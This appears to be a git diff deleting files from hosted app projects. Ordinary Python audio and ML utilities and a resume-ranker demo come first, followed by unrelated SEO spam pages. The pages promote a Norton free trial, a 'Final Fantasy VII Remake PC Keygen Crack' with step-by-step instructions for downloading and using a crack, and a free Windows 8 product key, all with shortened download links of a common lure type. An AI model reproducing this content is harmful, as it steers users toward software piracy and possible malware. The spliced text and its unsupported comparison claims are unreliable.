- - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, 
min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - 
clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/zhuolisam/resume-ranker/demo.py b/spaces/zhuolisam/resume-ranker/demo.py deleted file mode 100644 index 6ca61d2a6e97290eb8742b0d2c096d66a9dd6396..0000000000000000000000000000000000000000 --- a/spaces/zhuolisam/resume-ranker/demo.py +++ /dev/null @@ -1,26 +0,0 @@ -from pdf_loader import load_documents -from core import pipeline - -if __name__ == '__main__': - pipeline('''About Sleek - -Sleek is on a mission to revolutionize how entrepreneurs operate their business. We want to give small business owners peace of mind and the power of online solutions to allow them to focus on what they do best - growing their business. As we work for our thousands of customers, we gather millions of data points about their business, and in turn we transform those into useful, actionable insights and recommendations to accelerate their growth through smart algorithms. - -We are a team of 400 builders from 17 countries, with offices in Singapore, Philippines, Hong Kong, Australia and the UK committed to delivering a delightful experience to our clients! - -You will be working in the Data & Analytics organization to solve a wide range of business problems leveraging advanced analytics. You will deploy a flexible analytical skill set to deliver insightful data and analysis and model business scenarios. Your principal goal will be to use data to drive better business decisions. This means translating data into meaningful insights and recommendations and, where relevant, proactively implement improvements. You will be developing the business reporting and analysis for our internal operations world-wide. 
The job will require working closely with the various Business Units to understand their business question as well as the whole data team to understand and access available data. - -Position Duties -Drive analytical problem-solving and deep dives. Work with large, complex data sets. Solve difficult, non-routine problems, applying advanced quantitative methods. -Collaborate with a wide variety of cross-functional partners to determine business needs, drive analytical projects from start to finish. -Align with involved stakeholders to set up dashboards and reports to drive data driven decision across all departments -Working very closely with our Data team, Tech and Product team to understand the business logic to generate accurate reports and correct analysis - -Requirements - -Performance Standards -Able to commit for a period of at least 4 months -Currently pursuing a degree in Business Science, Engineering or relevant disciplines with a focus on data. -Good knowledge in SQL, R and Python. 
-Experience in data visualization tools (Tableau, PowerBI, Google DataStudio or equivalent) will be an added advantage.''', - load_documents(source_dir = 'documents')) diff --git a/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py b/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py deleted file mode 100644 index 88597d62a505715091f9ba62d38bf0a85a31b95a..0000000000000000000000000000000000000000 --- a/spaces/zomehwh/sovits-goldship/vdecoder/hifigan/nvSTFT.py +++ /dev/null @@ -1,111 +0,0 @@ -import math -import os -os.environ["LRU_CACHE_CAPACITY"] = "3" -import random -import torch -import torch.utils.data -import numpy as np -import librosa -from librosa.util import normalize -from librosa.filters import mel as librosa_mel_fn -from scipy.io.wavfile import read -import soundfile as sf - -def load_wav_to_torch(full_path, target_sr=None, return_empty_on_exception=False): - sampling_rate = None - try: - data, sampling_rate = sf.read(full_path, always_2d=True)# than soundfile. - except Exception as ex: - print(f"'{full_path}' failed to load.\nException:") - print(ex) - if return_empty_on_exception: - return [], sampling_rate or target_sr or 32000 - else: - raise Exception(ex) - - if len(data.shape) > 1: - data = data[:, 0] - assert len(data) > 2# check duration of audio file is > 2 samples (because otherwise the slice operation was on the wrong dimension) - - if np.issubdtype(data.dtype, np.integer): # if audio data is type int - max_mag = -np.iinfo(data.dtype).min # maximum magnitude = min possible value of intXX - else: # if audio data is type fp32 - max_mag = max(np.amax(data), -np.amin(data)) - max_mag = (2**31)+1 if max_mag > (2**15) else ((2**15)+1 if max_mag > 1.01 else 1.0) # data should be either 16-bit INT, 32-bit INT or [-1 to 1] float32 - - data = torch.FloatTensor(data.astype(np.float32))/max_mag - - if (torch.isinf(data) | torch.isnan(data)).any() and return_empty_on_exception:# resample will crash with inf/NaN inputs. 
return_empty_on_exception will return empty arr instead of except - return [], sampling_rate or target_sr or 32000 - if target_sr is not None and sampling_rate != target_sr: - data = torch.from_numpy(librosa.core.resample(data.numpy(), orig_sr=sampling_rate, target_sr=target_sr)) - sampling_rate = target_sr - - return data, sampling_rate - -def dynamic_range_compression(x, C=1, clip_val=1e-5): - return np.log(np.clip(x, a_min=clip_val, a_max=None) * C) - -def dynamic_range_decompression(x, C=1): - return np.exp(x) / C - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - return torch.log(torch.clamp(x, min=clip_val) * C) - -def dynamic_range_decompression_torch(x, C=1): - return torch.exp(x) / C - -class STFT(): - def __init__(self, sr=22050, n_mels=80, n_fft=1024, win_size=1024, hop_length=256, fmin=20, fmax=11025, clip_val=1e-5): - self.target_sr = sr - - self.n_mels = n_mels - self.n_fft = n_fft - self.win_size = win_size - self.hop_length = hop_length - self.fmin = fmin - self.fmax = fmax - self.clip_val = clip_val - self.mel_basis = {} - self.hann_window = {} - - def get_mel(self, y, center=False): - sampling_rate = self.target_sr - n_mels = self.n_mels - n_fft = self.n_fft - win_size = self.win_size - hop_length = self.hop_length - fmin = self.fmin - fmax = self.fmax - clip_val = self.clip_val - - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - if fmax not in self.mel_basis: - mel = librosa_mel_fn(sr=sampling_rate, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax) - self.mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device) - self.hann_window[str(y.device)] = torch.hann_window(self.win_size).to(y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_length)/2), int((n_fft-hop_length)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_length, win_length=win_size, 
window=self.hann_window[str(y.device)], - center=center, pad_mode='reflect', normalized=False, onesided=True) - # print(111,spec) - spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9)) - # print(222,spec) - spec = torch.matmul(self.mel_basis[str(fmax)+'_'+str(y.device)], spec) - # print(333,spec) - spec = dynamic_range_compression_torch(spec, clip_val=clip_val) - # print(444,spec) - return spec - - def __call__(self, audiopath): - audio, sr = load_wav_to_torch(audiopath, target_sr=self.target_sr) - spect = self.get_mel(audio.unsqueeze(0)).squeeze(0) - return spect - -stft = STFT()
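Two of the helpers in the deleted utility module earlier in this diff (`intersperse` and `convert_pad_shape`) are pure list operations, so their behavior can be checked without torch. The following is a standalone sketch mirroring those functions, not part of the deleted sources:

```python
# Torch-free sketch of two list helpers from the deleted utility module above.
# Both are copied verbatim in logic; no external dependencies are needed,
# so their behavior is easy to verify in isolation.

def intersperse(lst, item):
    # Place `item` before, between, and after every element of `lst`:
    # [a, b] -> [item, a, item, b, item]
    result = [item] * (len(lst) * 2 + 1)
    result[1::2] = lst
    return result

def convert_pad_shape(pad_shape):
    # torch.nn.functional.pad expects pad widths for the *last* dimension
    # first, so reverse the per-dimension [left, right] pairs and flatten.
    reversed_pairs = pad_shape[::-1]
    return [item for sublist in reversed_pairs for item in sublist]

if __name__ == "__main__":
    print(intersperse([1, 2, 3], 0))                    # [0, 1, 0, 2, 0, 3, 0]
    print(convert_pad_shape([[0, 0], [0, 0], [1, 0]]))  # [1, 0, 0, 0, 0, 0]
```

This is why `shift_1d` above passes `[[0, 0], [0, 0], [1, 0]]` and gets a flat `[1, 0, 0, 0, 0, 0]` pad spec: one sample of left padding on the time axis, nothing elsewhere.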
    -

    How to Download Norton Antivirus Free Trial for 60 Days

    -

If you are looking for reliable, powerful antivirus software to protect your devices from viruses, malware, ransomware, and other online threats, you might want to try Norton Antivirus. Norton Antivirus is one of the most popular and trusted antivirus solutions on the market, with millions of satisfied customers worldwide. But before you commit to a paid subscription, it is worth testing it first to see if it meets your needs and expectations. Fortunately, Norton offers a free trial for its antivirus products, which gives you full access to all its features and benefits for 60 days. In this article, we will show you how to download the Norton Antivirus free trial for 60 days and why you should choose Norton over other antivirus software.

    -

    Download Norton Antivirus Free Trial For 60 Days


Download Zip: https://tinourl.com/2uL0kJ



    -

    What is Norton Antivirus and Why You Need It

    -

    Norton Antivirus is a comprehensive security suite that provides protection for your devices against viruses, malware, ransomware, and other online threats. It also offers online privacy and identity theft protection with features like VPN, password manager, dark web monitoring, parental control, and more. With Norton Antivirus, you can surf the web, shop online, bank online, and use social media with confidence and peace of mind.

    -

    Norton Antivirus Features and Benefits

    -

    Norton Antivirus has many features and benefits that make it stand out from other antivirus software. Here are some of them:

    -
      -
    • Antivirus and ransomware protection: Norton Antivirus uses advanced technology to detect and remove viruses, malware, ransomware, and other threats from your devices. It also has a 100% virus protection promise, which means that if your device gets infected while using Norton Antivirus, they will refund your money or help you fix it.
    • -
    • Firewall: Norton Antivirus has a smart firewall that monitors your network traffic and blocks unauthorized access to your devices. It also gives you detailed information about the applications that are trying to connect to the internet, such as their popularity, reputation, digital signature, etc.
    • -
    • Password manager: Norton Antivirus has a password manager that helps you create, store, and manage your passwords securely. It also helps you fill in your login details automatically on websites and apps.
    • -
    • VPN: Norton Antivirus has a VPN (virtual private network) that encrypts your internet connection and hides your IP address. This helps you browse the web anonymously and access geo-restricted content.
    • -
    • Cloud backup: Norton Antivirus has a cloud backup feature that lets you store your important files online in a secure location. This helps you protect your data from loss, theft, or damage.
    • -
    • Dark web monitoring: Norton Antivirus has a dark web monitoring feature that scans the dark web for your personal information, such as your email, phone number, credit card, etc. It alerts you if it finds any of your information exposed or compromised on the dark web.
    • -
    • Parental control: Norton Antivirus has a parental control feature that helps you monitor and manage your children's online activities. You can set time limits, block inappropriate content, track their location, and more.
    • -
    • Performance optimization: Norton Antivirus has a performance optimization feature that helps you speed up your devices and improve their battery life. It also helps you free up disk space, delete unwanted files, and update your applications.
    • -
    -

    Norton Antivirus Comparison with Other Antivirus Software

    -

    Norton Antivirus is not the only antivirus software in the market. There are many other options available, such as McAfee, Kaspersky, Bitdefender, Avast, etc. How does Norton Antivirus compare with them? Here are some factors to consider:

| Factor | Norton Antivirus | Other Antivirus Software |
| --- | --- | --- |
| Price | Norton Antivirus offers a free trial for 60 days, which is longer than most other antivirus software. After the trial period, you can choose from different plans that suit your budget and needs. The cheapest plan costs $39.99 per year and covers one device. The most expensive plan costs $149.99 per year, covers up to 10 devices, and includes VPN, cloud backup, dark web monitoring, and parental control. | Other antivirus software also offer free trials, but they are usually shorter than Norton's. For example, McAfee offers a 30-day free trial, Kaspersky offers a 15-day free trial, and Bitdefender offers a 14-day free trial. After the trial period, their prices vary depending on the features and number of devices they cover. For example, McAfee costs $59.99 per year for one device, Kaspersky costs $79.99 per year for three devices, and Bitdefender costs $89.99 per year for five devices. |
| Features | Norton Antivirus has a wide range of features that cover all aspects of online security and privacy: antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, dark web monitoring, parental control, and performance optimization. It also has a 100% virus protection promise and a 60-day money-back guarantee. | Other antivirus software have some of the features that Norton Antivirus has, but they may not have all of them, or they may charge extra for them. For example, McAfee and Kaspersky each offer antivirus and ransomware protection, firewall, password manager, VPN, cloud backup, and parental control, but neither includes dark web monitoring or performance optimization. Bitdefender offers the same core features but charges extra for dark web monitoring and performance optimization. |
| Customer Support | Norton Antivirus has a 24/7 customer support service that you can contact via phone, chat, or email. They also have a community forum, a knowledge base, and a blog where you can find answers to common questions and issues. | Other antivirus software also have customer support services, but they may not be available 24/7, or they may have limited options. For example, McAfee has 24/7 phone support, but its chat and email support are only available during business hours. Kaspersky has 24/7 chat support, but its phone and email support are only available during business hours. Bitdefender has 24/7 email support, but its phone and chat support are only available during business hours. |
    -

    As you can see, Norton Antivirus has many advantages over other antivirus software in terms of price, features, and customer support. It is a comprehensive and reliable security suite that can protect your devices from all kinds of online threats and give you online privacy and identity theft protection. It also has a generous free trial period that lets you try it out for 60 days without any risk or obligation.

    -

    -

    How to Get Norton Antivirus Free Trial for 60 Days

    -

    If you are interested in trying out Norton Antivirus for free for 60 days, you can follow these simple steps:

    -

    Step 1: Visit the Norton Free Trial Page and Choose Your Plan

    -

    The first step is to visit the Norton free trial page and choose the plan that suits your needs. You can choose from four plans:

    -
      -
    • Norton AntiVirus Plus: This plan covers one device (PC or Mac) and includes antivirus and ransomware protection, firewall, password manager, cloud backup (2 GB), and performance optimization.
    • -
    • Norton 360 Standard: This plan covers one device (PC, Mac, smartphone, or tablet) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (10 GB), dark web monitoring, and performance optimization.
    • -
    • Norton 360 Deluxe: This plan covers up to five devices (PCs, Macs, smartphones, or tablets) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (50 GB), dark web monitoring, parental control, and performance optimization.
    • -
    • Norton 360 with LifeLock Select: This plan covers up to 10 devices (PCs, Macs, smartphones, or tablets) and includes antivirus and ransomware protection, firewall, password manager, VPN (unlimited data), cloud backup (100 GB), dark web monitoring, parental control, performance optimization, and identity theft protection with LifeLock.
    • -
    -

    Once you choose your plan, click on the Start Free Trial button and you will be redirected to the checkout page.

    -

    Step 2: Create an Account and Provide a Credit Card for Norton to Keep on File

    -

    The next step is to create an account with Norton and provide a credit card for them to keep on file. You will need to enter your name, email address, password, and billing information. Don't worry, you will not be charged anything until the end of the 60-day trial period. You can cancel anytime before that if you don't want to continue using Norton Antivirus.

    -

    After you enter your details, click on the Agree & Continue button and you will receive a confirmation email from Norton with your order number and instructions on how to download and install Norton Antivirus on your device.

    -

    Step 3: Download and Install Norton Antivirus on Your Device

    -

    The final step is to download and install Norton Antivirus on your device. You can do this by following the link in the confirmation email or by logging in to your Norton account and clicking on the Download button. You will need to choose the device type (PC, Mac, smartphone, or tablet) and follow the instructions on the screen to complete the installation process.

    -

    Once you install Norton Antivirus on your device, you can start using it right away and enjoy all its features and benefits for 60 days. You can also manage your subscription, view your account details, and access other Norton services from your Norton account dashboard.

    -

    How to Cancel Norton Antivirus Free Trial Before It Expires

    -

    If you decide that you don't want to continue using Norton Antivirus after the 60-day trial period, you can cancel it easily before it expires. Here are the steps to cancel your Norton Antivirus free trial:

    -

    Step 1: Log in to Your Norton Account and Go to My Subscriptions

    -

    The first step is to log in to your Norton account and go to the My Subscriptions section. You can do this by clicking on the My Account icon at the top right corner of the page and selecting My Subscriptions from the drop-down menu.

    -

    Step 2: Find Your Norton Antivirus Plan and Click Turn Off Automatic Renewal

    -

    The next step is to find your Norton Antivirus plan in the list of subscriptions and click on the Turn Off Automatic Renewal button. You will see a pop-up window asking you to confirm your cancellation. Click on the Turn Off button and you will see a message saying that your automatic renewal has been turned off.

    -

    Step 3: Confirm Your Cancellation and Keep Your Confirmation Email

    -

    The final step is to confirm your cancellation and keep your confirmation email. You will receive an email from Norton with your cancellation details and a reminder that you can still use Norton Antivirus until the end of your trial period. You should keep this email as a proof of your cancellation in case of any issues or disputes.

    -

    Conclusion

    -

    Norton Antivirus is a great choice for anyone who wants to protect their devices from online threats and enjoy online privacy and identity theft protection. It has many features and benefits that make it superior to other antivirus software in the market. It also has a generous free trial offer that lets you try it out for 60 days without any risk or obligation.

    -

    If you want to download Norton Antivirus free trial for 60 days, you can follow the steps we have outlined in this article. You can also cancel your free trial anytime before it expires if you are not satisfied with it. We hope this article has been helpful and informative for you. If you have any questions or feedback, please feel free to leave a comment below.

    -

    FAQs

    -

    Here are some frequently asked questions about Norton Antivirus free trial:

    -
      -
    • Q: How many devices can I protect with Norton Antivirus free trial?
    • -
• A: The number of devices you can protect with the Norton Antivirus free trial depends on the plan you choose. The AntiVirus Plus plan covers one device (PC or Mac), the 360 Standard plan covers one device (PC, Mac, smartphone, or tablet), the 360 Deluxe plan covers up to five devices (PCs, Macs, smartphones, or tablets), and the 360 with LifeLock Select plan covers up to 10 devices (PCs, Macs, smartphones, or tablets).
    • -
    • Q: How long does the Norton Antivirus free trial last?
    • -
    • A: The Norton Antivirus free trial lasts for 60 days from the date of activation. You can cancel your free trial anytime before it expires if you don't want to continue using Norton Antivirus.
    • -
    • Q: How do I activate my Norton Antivirus free trial?
    • -
    • A: To activate your Norton Antivirus free trial, you need to visit the Norton free trial page, choose your plan, create an account, and provide a credit card for Norton to keep on file. You will not be charged anything until the end of the 60-day trial period. You will also receive a confirmation email with instructions on how to download and install Norton Antivirus on your device.
    • -
    • Q: How do I cancel my Norton Antivirus free trial?
    • -
    • A: To cancel your Norton Antivirus free trial, you need to log in to your Norton account, go to the My Subscriptions section, find your Norton Antivirus plan, and click on the Turn Off Automatic Renewal button. You will receive a confirmation email with your cancellation details. You can still use Norton Antivirus until the end of your trial period.
    • -
    • Q: What happens after my Norton Antivirus free trial expires?
    • -
    • A: After your Norton Antivirus free trial expires, you will be automatically charged for the plan you chose unless you cancel it before it expires. You will also receive a reminder email before your trial period ends. If you want to continue using Norton Antivirus, you don't need to do anything. If you want to change or cancel your plan, you can do so from your Norton account.
    • -

    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md b/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md deleted file mode 100644 index f9ee4fdc0f946d081153f602d3e6204f3b0be44a..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Final Fantasy Vii Remake Pc Keygen Crack A Step-by-Step Guide.md +++ /dev/null @@ -1,101 +0,0 @@ - -

    Final Fantasy VII Remake PC Keygen Crack

    -

    If you are a fan of Final Fantasy VII, one of the most iconic and beloved RPGs of all time, you might be interested in playing its remake on your PC. But how can you do that without paying a hefty price for the game? In this article, we will tell you everything you need to know about Final Fantasy VII Remake PC Keygen Crack, a tool that can help you generate a unique activation code for the game. But first, let's take a look at what Final Fantasy VII Remake is and what it offers.

    -

    What is Final Fantasy VII Remake?

    -

    Final Fantasy VII Remake is a partial remake of Final Fantasy VII, a game that was originally released in 1997 for the PlayStation console. The remake was developed by Square Enix and released in 2020 for the PlayStation 4. It is the first part of a planned series of games that will retell the story of Final Fantasy VII with modern graphics, gameplay, and voice acting.

    -

    Final Fantasy Vii Remake Pc Keygen Crack


Download: https://tinourl.com/2uL2RR



    -

    A brief summary of the game's story and features

    -

    The game follows Cloud Strife, a former soldier who joins a group of eco-terrorists called Avalanche, who are fighting against the Shinra Electric Power Company, a corporation that is exploiting the planet's life force (mako) through its mako reactors. Along the way, Cloud meets other characters who join his quest, such as Tifa Lockhart, Aerith Gainsborough, Barret Wallace, and Red XIII. Together, they face various enemies and challenges, including Sephiroth, a mysterious figure from Cloud's past who has a sinister agenda.

    -

    The game features an action-based combat system that allows players to switch between different characters and use their abilities in real-time. The game also has a tactical mode that slows down time and lets players choose commands from a menu. The game also incorporates elements from the original game, such as materia (magic orbs that grant different powers), limit breaks (special attacks that can be unleashed when a gauge is filled), and summons (powerful creatures that can be called to aid in battle).

    -

    The differences between the original and the remake

    -

    While Final Fantasy VII Remake is based on the original game, it is not a faithful reproduction. The remake expands on the original story and adds new scenes, characters, dialogue, and lore. The remake also changes some aspects of the original game, such as the sequence of events, the gameplay mechanics, and the ending. The remake also introduces new concepts and mysteries that are not explained in the original game.

    -

    The new episode featuring Yuffie Kisaragi

    -

    One of the new additions to Final Fantasy VII Remake is an additional episode that focuses on Yuffie Kisaragi, a ninja girl who was an optional character in the original game. The episode is only available in Final Fantasy VII Remake Intergrade, an updated rerelease of Final Fantasy VII Remake that we will talk about later. The episode takes place during the events of Final Fantasy VII Remake and shows Yuffie's mission to infiltrate Midgar, the city where Shinra's headquarters are located, and steal a powerful materia that might be used to save her homeland of Wutai. The episode also introduces new characters, such as Sonon Kusakabe, Yuffie's partner; Zhijie, a Wutai spy; Nayo, Billy Bob, and Polk, members of Avalanche's splinter cell; Weiss, Nero, and Scarlet, antagonists from Shinra; and Ramuh, a new summon.

    -

    What is Final Fantasy VII Remake Intergrade?

    -

    Final Fantasy VII Remake Intergrade is an updated rerelease of Final Fantasy VII Remake that was released in 2021 for the PlayStation 5. It includes all the content from Final Fantasy VII Remake plus some enhancements and additions.

    -

    The improvements and new bosses in Intergrade

    -

Final Fantasy VII Remake Intergrade improves on Final Fantasy VII Remake by offering better graphics, faster loading times, higher frame rates, haptic feedback support, photo mode, and DualSense controller features. It also adds new boss encounters, such as Weiss and Nero, through the Yuffie episode.

    The system requirements and availability of Intergrade

    -

    Final Fantasy VII Remake Intergrade is available for PlayStation 5 and PC. The PC version was released on December 16, 2021 through the Epic Games Store and Steam. The PC version is also compatible with the Steam Deck, a handheld gaming device that will be released in early 2022. The system requirements for the PC version are as follows:

    -

    | Minimum | Recommended |
    | --- | --- |
    | OS: Windows 10 64-bit | OS: Windows 10 64-bit |
    | Processor: Intel Core i5-2500K or AMD Ryzen 3 1200 | Processor: Intel Core i7-6700K or AMD Ryzen 7 3700X |
    | Memory: 8 GB RAM | Memory: 16 GB RAM |
    | Graphics: NVIDIA GeForce GTX 1060 or AMD Radeon RX 480 | Graphics: NVIDIA GeForce RTX 2070 or AMD Radeon RX 5700 XT |
    | DirectX: Version 12 | DirectX: Version 12 |
    | Storage: 100 GB available space | Storage: 100 GB available space |

    What is Final Fantasy VII Remake PC Keygen Crack?

    -

    Final Fantasy VII Remake PC Keygen Crack is a tool that can generate a unique activation code for Final Fantasy VII Remake Intergrade on PC. By using this tool, you can bypass the need to purchase the game from the official platforms and play it for free. However, this tool also comes with some benefits and risks that you should be aware of before using it.

    -

    The benefits and risks of using a keygen crack

    -

    The main benefit of using a keygen crack is that you can save money and play Final Fantasy VII Remake Intergrade on PC without paying anything. You can also enjoy the game without any restrictions or limitations, such as online verification or DRM protection. You can also share the activation code with your friends or family members who want to play the game as well.

    -

    However, using a keygen crack also has some risks that you should consider. First of all, using a keygen crack is illegal and violates the terms of service of the game developers and publishers. You could face legal consequences or penalties if you are caught using a keygen crack. Secondly, using a keygen crack could expose your PC to malware or viruses that could harm your system or steal your personal information. You could also lose your progress or data if the keygen crack is faulty or incompatible with your PC. Thirdly, using a keygen crack could prevent you from accessing some features or updates of the game, such as online multiplayer, patches, DLCs, or mods. You could also miss out on some benefits or rewards that are exclusive to legitimate buyers of the game.

    -

    The sources and instructions to download and use a keygen crack

    -

    If you still want to use a keygen crack to play Final Fantasy VII Remake Intergrade on PC, you should be careful about where you download it from and how you use it. Here are some tips and steps to follow:

    -
      -
    • Do some research and find a reliable and trustworthy source that offers a working and safe keygen crack for Final Fantasy VII Remake Intergrade on PC. You can check some reviews, ratings, comments, or feedback from other users who have used the keygen crack before.
    • -
    • Download the keygen crack from the source and scan it with an antivirus program before running it on your PC. Make sure that the keygen crack does not contain any malware or viruses that could harm your PC.
    • -
    • Run the keygen crack and follow the instructions on how to generate an activation code for Final Fantasy VII Remake Intergrade on PC. Usually, you will have to enter some information, such as your name, email address, or region.
    • -
    • Copy the activation code that is generated by the keygen crack and paste it into the game launcher or installer when prompted. You should be able to play Final Fantasy VII Remake Intergrade on PC without any problems.
    • -
    • Enjoy the game and have fun!
    • -
    -

    Conclusion

    -

    In conclusion, Final Fantasy VII Remake Intergrade is an amazing game that offers a new and improved experience of Final Fantasy VII Remake with enhanced graphics, gameplay, and content. Some players who want to play it on PC without paying turn to a keygen crack that can generate an activation code. However, you should be aware of the benefits and risks of using a keygen crack and take precautions when downloading and using one.

    -

    If you liked this article, please share it with your friends who are interested in Final Fantasy VII Remake Intergrade on PC. Also, let us know what you think about the game and the keygen crack in the comments below. Thank you for reading!

    -

    Frequently Asked Questions

    -
      -
    • Q: Is Final Fantasy VII Remake Intergrade worth playing?
    • -
    • A: Yes, Final Fantasy VII Remake Intergrade is worth playing if you are a fan of Final Fantasy VII or RPGs in general. It offers a stunning and immersive experience of one of the most iconic games of all time with modern graphics, gameplay, and voice acting. It also adds new content and features that expand on the original story and lore.
    • -
    • Q: How long is Final Fantasy VII Remake Intergrade?
    • -
    • A: Final Fantasy VII Remake Intergrade is about 40 hours long if you focus on the main story only. However, if you want to complete all the side quests, challenges, mini-games, collectibles, trophies, and secrets, it could take up to 80 hours or more.
    • -
    • Q: How many parts will Final Fantasy VII Remake have?
    • -
    • A: Square Enix has not yet confirmed how many parts Final Fantasy VII Remake will have. However, based on the amount of content and story covered in Final Fantasy VII Remake Intergrade (which only goes up to the escape from Midgar), it is estimated that there will be at least three or four parts in total.
    • -
    • Q: Can I play Final Fantasy VII Remake Intergrade without playing Final Fantasy VII Remake?
    • -
    • A: Yes, you can play Final Fantasy VII Remake Intergrade without playing Final Fantasy VII Remake first. However, it is recommended that you play Final Fantasy VII Remake first to understand the story and characters better. Also, some features and content in Final Fantasy VII Remake Intergrade might require data transfer from Final Fantasy VII Remake.
    • -
    • Q: Can I play FF7R EPISODE INTERmission without playing Final Fantasy VII Remake Intergrade?
    • -
    • A: No, you cannot play FF7R EPISODE INTERmission without playing Final Fantasy VII Remake Intergrade first. FF7R EPISODE INTERmission is an additional episode that is included in Final Fantasy VII Remake Intergrade only. You need to have access to Final Fantasy VII Remake Intergrade to play FF7R EPISODE INTERmission.
    • -
    -

    -
    -
    \ No newline at end of file diff --git a/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md b/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md deleted file mode 100644 index 3b5547ef876e1eb522ae564c11271f177c531074..0000000000000000000000000000000000000000 --- a/spaces/raedeXanto/academic-chatgpt-beta/Free Download EN Windows 8 x64 DVD 915440 Product Key Benefits and Features.md +++ /dev/null @@ -1,110 +0,0 @@ - -

    What is freedownloadenwindows8x64dvd915440productkey?

    -

    If you are looking for a way to install or reinstall Windows 8.1 on your PC, you may have come across this term: freedownloadenwindows8x64dvd915440productkey. But what does it mean and how can you use it? In this article, we will explain everything you need to know about this product key and how to download and use it.

    -

    freedownloadenwindows8x64dvd915440productkey


    Download Filehttps://tinourl.com/2uKZJb



    -

    A product key is a 25-character code that is used to activate a software or operating system. It usually looks something like this: XXXXX-XXXXX-XXXXX-XXXXX-XXXXX. A product key is required to install or reinstall Windows 8.1 on your PC.

    -

